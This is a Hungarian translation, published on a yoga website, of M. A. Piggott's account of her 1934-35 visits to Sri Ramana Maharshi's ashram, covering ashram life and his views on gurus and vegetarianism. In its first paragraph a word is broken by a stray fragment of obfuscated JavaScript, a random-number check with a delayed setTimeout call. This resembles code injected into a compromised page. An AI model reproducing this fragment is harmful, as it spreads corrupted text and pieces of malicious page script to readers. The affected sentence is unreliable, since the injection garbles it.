Top
Urbán Jógi Live / Filozófia  / Guru első látásra
ramana_guru1

Guru első látásra

M. A. Piggott: A Szellem útja. I. rész

 

Ez a cikk olyan látogatásokról mesél, melyeket a szerző – első európai hölgyként – Srí Ramana Maharsi, a híres dél-indiai bölcs ásramjába tett 1934-35-ben.

 

Korábban is jártam már Indiában, de ez volt az első utam, amikor letértem a kitaposott ösvényről. Amikor az ember a barátainál vagy Bombay és Kalkutta minden modern kényelemmel ellátott fényűző szállodáiban lakik, nem alkothat képet arról, amivel találkozni fog, ha elhagyja a főútvonalat. Az enyém azonban egy előre megfontolt kalandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and volt, és nem számított semmi egyéb.

 

Már évek óta vágytam arra, hogy találkozzam eggyel India szent emberei közül, de mindeddig hiába. Igaz ugyan, hogy beszéltem néhány szent életű emberrel és médiumi képességekkel bíró fakírral, akik a maguk módján kétségtelenül őszinték voltak, de ők nem azt képviselték, amit én kerestem. Ekkor hallottam Srí Ramana Maharsiról, és abból a kevésből, ami a tudomásomra jutott, azonnal világossá vált számomra, hogy bárhová elutazom és bármilyen kényelmetlenséget vállalok azért, hogy találkozhassak vele.

 

A barátom, aki a Maharsi létezésének örvendetes hírével szolgált, felajánlotta, hogy elvisz hozzá. Egy késő délután meg is érkeztünk Tiruvannámalaiba. Szállást egy nem túl tiszta „dak” bungalóban, vagyis utazók számára fenntartott vendégfogadóban kaptunk. Ilyet talál az ember Indiában, ha elkóborol a városból. Ágynemű nem tartozik a szolgáltatások közé, és általában sok bútor sincs a szobában. Mi azonban ott hagytuk a szolgálómat, hogy birkózzon meg ezekkel a részletekkel, és a bazárba, majd az ásramba indultunk egy póni húzta kordéval. Az utazás kissé fárasztó volt, de nagy várakozással tekintettünk a találkozás elé.

 

Az ásram lakói közül, legtöbben a Maharsi követői, sokan üdvözlésünkre siettek. Közöttük volt a Maharsi öccse is. Narancsszínű ruhát viselt, ami annak jele, hogy szannjászin, vagyis olyasvalaki, aki lemondott a világról. A többiek nem voltak szerzetesek a szó nyugati értelmében, és egy ásram sem kolostor. Sokkal inkább olyan hely, ahol olyan emberek élnek, akik tanulni vágynak, és spirituális életet szeretnének élni. Gyakran nincsenek szabályok vagy kötelező előírások, és bárki jöhet vagy mehet kedve szerint. Még nőket is szívesen látnak, bár ők nem aludhatnak az ásram területén.

 

A legtöbben beszéltek angolul, és rendkívül barátságosan fogadtak. Ez bátorítólag hatott rám, mivel ideges voltam, hiszen azt mondták, én vagyok az első európai asszony, aki felkeresi a Maharisit vagy Maharsit, ahogy általában szólítják. Egyszerre bevezettek bennünket, hogy találkozzunk a szent emberrel, és miután indiai módon üdvözöltük – két tenyerünket összetéve, majd a homlokunkhoz emelve –, felajánlásainkat letettük elé a földre. Egy díványon ült, melyre egy nagy leopárdbőrt terítettek. A dívány előtt szantálfa füstölők égtek, és egy kis parázstartó üst, amelyre folyamatosan valamilyen különleges tömjént dobtak.

 

Körülbelül egy tucat ember volt a teremben. Halkan beszélgettek, és egy kisgyerek gügyögött az édesanyjának. Hamarosan ezek a hangok elcsitultak, és minden elcsendesedett. Keresztbe tett lábakkal leültem a padlóra a többiekkel, jóllehet figyelmesen egy széket készítettek oda nekem.

 

Egy darabig semmi sem történt. Megpróbáltam koncentrálni az elmémet. Hirtelen arra lettem figyelmes, hogy a Maharsi szeme rám szegeződik. Szemei szó szerint olyanok voltak, mint az izzó széndarabok, és szinte átfúrták az embert. Ragyogtak a félhomályban. Soha semmit nem tapasztaltam azelőtt, ami ilyen megsemmisítő erejű lett volna. Szinte félelmetes volt. Nehéz lenne leírni, min mentem keresztül abban a rettenetes fél órában, melyben önmagam és saját életem kicsinyességével számot vetettem. Nem arról van szó, hogy a Maharsi bírált volna, akár csendben is – erre ő képtelen volt –, hanem hogy a tökéletesség fényében minden tökéletlenség napvilágra kerül. Hogy megmutassa, milyen kevéssé volt felelős az érzéseimért, azt mondta nekem később, hogy a kételkedés, az önbizalom hiánya és az önbecsmérlés a Valóság felismerésének legnagyobb akadályai közé tartozik.

 

A Maharsi most felállt, és esti sétájára indult. Erre a jelre mindenki kitódult a teremből.

 

Az egyik követő felajánlotta, hogy végigvezet bennünket az ásramon, mely egy csoport fehérre meszelt, makulátlanul tiszta épületből és kunyhóból áll. Ezeket esetenként fedett átjáró köti össze. Az ásram félúton található felfelé az Arunácsala híres hegye felé. Ezen a hegyoldalon ütötte fel szállását a Maharsi több mint harminc esztendeje, és azóta is itt van az otthona. Látogatásom idején ötvenes évei elején járt, de idősebbnek tűnt, kétségtelenül amiatt, hogy miután elhagyta otthonát, nélkülözve és önmegtartóztatásban élt.

 

Már sötét volt, mire visszatértünk az esti meditációra, és a legtöbben távoztak azok közül, akik nem az ásramban laknak. A teremben ellenállhatatlan csend honolt. A szent ember szeme nem ragyogott immár, hanem nyugodt volt, és befelé figyelő. Mintha minden gondom szertefoszlott volna, és a nehézségek eltűntek. Semmi sem számított, amit fontosnak tartunk a világon. Az idő feledésbe merült. Az élet, számos megjelenésében, egy volt.

 

Másnap késő délután barátomnak haza kellett térnie, így hát idős szolgálóm gondjaira bízott. Szolgálóm atyáskodó, tisztességes ember volt, aki mindig ügyelt rá, hogy a vizet és a tejet megfelelő ideig forralják, s hogy minden éjszaka, amikor visszatérek az ásramból, rendes étel várjon a vendégfogadóban.

 

Ettől az időtől kezdve olyan napirend kezdődött számomra, amely sok hétig változatlan maradt. A rozoga kordé reggel hatkor megjelent értem. Elvitt az ásramba, majd este fél nyolckor visszajött, hogy hazavigyen. Hamarosan az egyensúlyozás olyan technikáját fejlesztettem ki, amely biztonságot jelentett, sőt majdnem kényelmesnek volt mondható, és az utazás elveszítette eredeti veszélyének java részét. Ennek ellenére sohasem lett egészen nyugodt, méghozzá a szalmában meghúzódó bogarak miatt, hiszen ezen a szalmán kellett kuporognom.

 

Az ásramban kaptam egy kis kunyhót, mely nem sokkal volt nagyobb kétszer két méteresnél. Ezt használhattam napközben. Egy széles deszka volt benne, egy szék és egy asztal, azon pedig egy mosdótál szappannal, törülközővel. Nem volt fényűző, de maga a gondolat és a törődés, amellyel adták, elmondhatatlanul megérintett. Mindazonáltal európai csontjaim nem szokták meg a matrac nélküli deszkaágyat, és az ebéd utáni pihenést alig nevezhettem pihenésnek.

 

Két fő étkezés volt, az egyik fél tizenkettőkor, a másik este nyolc táján. Az előbbit együtt fogyasztottam el a többiekkel. Az étel többé-kevésbé ugyanaz volt mindkét étkezéskor: rizs különféle zöldségekkel és aludttej. Mindenki a földön ült, egy banánlevéldarabbal maga előtt.

 

Az emberek a teremben gyűltek össze. A legtöbben csendben voltak, és a gondolataikba merültek. Időnként azonban olyan látogatók, vándorszerzetesek vagy követők bukkantak fel, akik a Maharsi áldásáért jöttek, és szent dalokat énekeltek vagy allegorikus történeteket meséltek.

 

Azok között, akik egy rövid látogatás erejéig megjelentek az ásramban, volt egy amerikai író is (Paul Brunton, az India titkai írója), akinek könyvei és tibeti kéziratokból készített fordításai jól ismertek.[1] Sok megvilágosító erejű beszélgetést folytattunk, de egy másik okból is örültem jelenlétének. Komoly megpróbáltatás volt számomra kérdéseket feltenni a teremben mindenki előtt, de az ő támogatásának köszönhetően félénkségem részben feloldódott. Összegyűjtöttük problémáinkat, és a Maharsi elé tártuk őket, legyenek akár csip-csup, akár komoly dolgok. Mindig volt kéznél tolmács, mivel a Maharsi ugyan ért angolul, de nem beszéli gördülékenyen a nyelvet. Azt ellenben azonnal tudja, hogy hajszálpontosan fordítottak-e, és ha nem, addig nem tágít, míg az ember tökéletesen meg nem érti őt. Egy napon felvetettük a guruság kérdését.

 

– A spirituális eredmény szempontjából szükséges, hogy az embernek legyen guruja, vagyis szellemi tanítója?

 

A Maharsi meghagyta, hogy olvassunk el egy tanulmányt, melyben az állt, hogy amiképpen minden testi és intellektuális képzés során tanító vagy oktató közreműködését keressük, ugyanez áll a spirituális kérdésekre is.

 

– És – tette hozzá a Maharsi – nem könnyű egy ilyen ember segítsége nélkül elérni a célt.

 

Hozzá fordultam:

 

– De hiszen Bhagavánnak nem volt guruja!

 

Rémült döbbenet moraja futott végig a termen. A Maharsi azonban a legkevésbé sem zavartatta magát merész megjegyzésemtől. Éppen ellenkezőleg, szeme felcsillant, amikor rám nézett, majd hátravetette a fejét, és tiszta szívből kacagni kezdett. Semmi mással nem tudta volna jobban belopni magát a szívembe. Az a szent, aki képes kinevetni önmagát, valóban szent.

 

Társam ezt követően a vegetarianizmus gyakran vitatott kérdésére vonatkozólag szeretett volna eligazítást kapni. Erről a kérdésről mindenkinek van véleménye. A Maharsi válasza az alábbiakban foglalható össze.

 

Az étel hatással van az elmére. Bizonyos táplálékok szattvikusabbá, vagyis elevenebbé, vibrálóbbá teszik. Bármiféle jóga gyakorlásához elengedhetetlen a vegetarianizmus. Arra a kérdésemre viszont, hogy megtapasztalhatja-e valaki a megvilágosodást, miközben húst fogyaszt, a Maharsi válasza igenlő volt, azzal a kikötéssel, hogy az embernek el kell hagynia a húst, és fokozatosan hozzá kell szoktatnia a testét a tisztább fajta ételekhez.

 

– Mindenesetre – folytatta a Maharsi – ha egyszer az ember elérte a megvilágosodást, kevéssé számít, hogy mit eszik. Csak a korai szakaszokban fontos. A nagy tűznek már mindegy, mivel tápláljuk.

 

 

[1] Az írónő W. Y. Evans-Wentzre utal, aki azonban (akárcsak Paul Brunton) angol származású. Piggott és Evans-Wentz Maharsival folytatott beszélgetéseit Munagála Vénkatarámajja feljegyezte, lásd: Talks with Sri Ramana Maharshi (Beszélgetések Srí Ramana Maharsival), Talk 13., 17., 18., 20., 22, 23. és 24. (A ford.)

 

A cikk második része itt olvasható: http://www.urbanjogi.hu/m-a-piggott-a-szellem-utja-ii-resz/

 

Forrás: „The Way of the Spirit.” In: Fragrant Petals. Devotees’ Reminiscences on Sri Bhagavan. Sri Ramanasramam, Tiruvannamalai, 2000. Malik Tóth István fordítása.

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.